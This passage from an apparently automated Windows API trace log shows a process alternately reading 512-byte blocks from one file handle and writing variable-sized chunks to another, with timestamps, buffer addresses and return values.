lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.382] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.382] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x343, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.383] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.383] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2fc, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.384] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.384] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.385] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.385] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.386] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.386] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x302, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.387] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.387] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.388] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.388] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.389] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.389] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.390] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.390] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.391] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.391] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.392] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.392] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.393] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.393] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x176, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.394] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.394] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.395] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x21a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.396] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.397] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.398] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x335, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.398] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.399] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x243, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.399] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.400] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.400] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.401] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.401] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.402] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.402] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.403] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.403] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.404] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x30c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.404] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.404] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2e9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.405] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.405] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.406] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.406] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.407] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.407] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.408] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.408] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.409] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.409] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.410] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.410] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x302, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.411] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.411] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.415] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.415] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.416] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.416] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.417] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.417] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.418] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.418] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2eb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.419] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.419] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.420] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.420] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.421] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.421] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.422] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.422] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.423] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.423] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ee, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.424] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.424] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3aa, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.425] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.425] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.426] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.426] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3c3, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.427] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.427] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3be, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.428] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.428] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x36e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.429] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.429] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.430] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.430] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.431] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.431] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.432] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.432] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.433] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.433] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x76, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.434] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.435] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x26a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | 